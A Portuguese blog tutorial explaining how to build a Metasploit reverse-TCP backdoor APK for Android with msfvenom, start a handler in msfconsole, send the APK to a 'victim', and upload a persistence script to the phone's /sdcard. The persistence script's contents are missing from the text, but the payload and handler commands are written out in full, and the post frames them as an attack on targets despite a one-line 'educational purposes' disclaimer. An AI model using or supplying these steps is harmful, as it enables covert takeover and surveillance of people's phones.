Backdoor Persistente para Android

Publicado por Igor Matsunaga em


Fala galera, neste tutorial vou mostrar como criar seu próprio backdoor para android, e como conseguir a persistência após a invasão.
Este tutorial é fornecido sem garantia de qualquer tipo e é destinado apenas para fins educacionais.

MSFVenom

MSFVenom é uma combinação entre Msfpayload e Msfencode. O msfvenom substituiu ambas em 8 de julho de 2015.

Vantagens

  • Uma única ferramenta
  • Opções de linha de comando padronizadas
  • Velocidade aumentada

MSFVenom possui uma ampla gama de opções disponíveis:

# msfvenom -h
root @ kali: ~ # msfvenom -h
MsfVenom - um gerador autônomo de payload do Metasploit.
Também um substituto para msfpayload e msfencode.
Uso: / opt / metasploit / apps / pro / msf3 / msfvenom [opções] 
Opções:
root @ kali: ~ # msfvenom -h
Erro: MsfVenom - um gerador de carga independente do Metasploit.
Também um substituto para msfpayload e msfencode.
Uso: / usr / bin / msfvenom [opções] 

Opções:
    -p, --payload Payload para usar. Especifique um '-' ou stdin para usar cargas úteis personalizadas
        --payload-options Lista as opções padrão da carga útil
    -l, --list [type] Lista um tipo de módulo. As opções são: payloads, encoders, nops, all
    -n, --nopsled Prefira um nopsled de tamanho [length] para o payload
    -f, --format Formato de saída (use --help-formats para uma lista)
        --help-formats Lista os formatos disponíveis
    -e, --encoder O codificador a ser usado
    -a, --arch A arquitetura a ser usada
        --plataforma A plataforma da carga útil
        --help-platforms Listar as plataformas disponíveis
    -s, --space O tamanho máximo da carga útil resultante
        --encoder-space O tamanho máximo da carga útil codificada (padrão para o valor -s)
    -b, --bad-chars A lista de caracteres para evitar o exemplo: '\ x00 \ xff'
    -i, --iterações O número de vezes para codificar a carga útil
    -c, --add-code Especifica um arquivo adicional de shellcode win32 para incluir
    -x, --template Especifica um arquivo executável personalizado para usar como modelo
    -k, --keep Preserve o comportamento do modelo e injete a carga como um novo encadeamento
    -o, --out Salve a carga útil
    -v, --var-name Especifica um nome de variável personalizada para usar em determinados formatos de saída
        --smallest Gere a menor carga útil possível
    -h, --help Mostra esta mensagem

Aqui está uma lista de plataformas disponíveis que podem ser inseridas ao usar o switch –platform .

# msfvenom --list platforms
Cisco ou Cisco
OSX ou osx
Solaris ou Solaris
BSD ou bsd
OpenBSD ou openbsd
hardware
Firefox ou firefox
BSDi ou bsdi
NetBSD ou netbsd
NodeJS ou nodejs
FreeBSD ou freebsd
Python ou python
AIX ou aix
JavaScript ou javascript
HPUX ou hpux
PHP ou php
Irix ou irix
Unix ou unix
Linux ou linux
Rubi ou rubi
Java ou java
Android ou android
Netware ou netware
Janelas ou janelas
mainframe
multi

Agora que já conhecemos um pouco dessa incrível ferramenta, vamos abrir o terminal é pôr a mão na massa!

Backdoor

Graças ao msfvenom, apenas uma linha de comando é necessária para criar nosso backdoor.

Caso não saiba seu IP, utilize o comando: # ifconfig
# msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.138 LPORT=4444 R > NSW.apk

Onde:

  • msfvenom: gerador de payload;
  • -p (payload): tipo de payload;
  • LHOST(localhost): endereço IP do dispositivo que fará a escuta;
  • LPORT(LocalPort): Porta de escuta;
  • R >: local de despejo do nosso payload;

Iniciando um handler

Ainda no terminal siga as instruções abaixo.

# service postgresql start
# msfdb init
# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set LHOST 10.0.0.138
# set LPORT 4444
# exploit

Onde:

msfconsole: inicia uma instancia do console MetaExploit.
use exploit/multi/handler: inicia uma instancia do handler global do MetaExploit. 
set LHOST: define onde será nosso handler, aqui você deve colocar o IP, DDNS de sua máquina .
set LPORT: define a porta de nosso handler
exploit: inicia nossa instancia.

Envie o apk para o alvo, quando o mesmo for instalado sua conexão será realizada.

Persistência

Geralmente, o dispositivo da sua vítima não está enraizado, então você não pode criar nenhum arquivo no diretório /etc/init.d devido as permissões, então estamos usando outro método para fazer o upload de um backdoor no diretório / sdcard usando o comando shell e executando um script que automaticamente faz um backdoor persistente no dispositivo.

logoNSW

Assim que você obtiver a sessão meterpreter, você precisará criar um arquivo ( .sh ) e colar o seguinte código nele.


Gerar o arquivo e salvar como algumaCoisa.sh (utilizei
yeahhub-backdoor.sh neste post)

Depois disso, você precisa entrar no diretório raiz do dispositivo android digitando “ cd / ” no terminal.

Agora você precisa entrar em / sdcard digitando “ cd / sdcard ” no mesmo terminal.

Aqui você pode enviar seu script de backdoor digitando “ upload yeahhub-backdoor.sh ” no mesmo terminal.

Agora tudo o que temos a fazer é executar o script uma vez e, em seguida, tudo será feito automaticamente, digite ” shell” para entrar no modo shell do sistema de dispositivo Android.

Aqui você precisa novamente entrar no mesmo local, por exemplo cd / root / sdcard e executar o backdoor usando “ sh yeahhub-backdoor.sh “.

Na captura de tela acima, como você pode ver, seu script foi executado com sucesso, você pode terminar a execução pressionando CTRL + C e então digite Y.

A persistência do backdoor só permanecerá até a reinicialização do sistema android. Se sua vítima estiver na mesma rede, ou seja, na LAN, a persistência permanecerá para sempre na LAN e se você tiver IP estático, sua persistência permanecerá para sempre na WAN também.

Que a segurança esteja com você!!!!

[products limit=”5″ columns=”4″ orderby=”date” order=”DESC” ids=”245,243,223,235,239″]

Igor Matsunaga

Diretor Técnico da NSWorld, entusiasta da área hacking a mais de 6 anos, hacker ético, formando em Segurança da Informação.

2 comentários

rom · dezembro 14, 2019 às 9:09 am

show! tentei outros videos e blog e nada so aqui com vc Igor que funcional :]

    Igor Matsunaga · dezembro 25, 2019 às 5:50 pm

    Muito obrigado pelo feedback, qualquer dúvida estamos a disposição. Abraço.

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *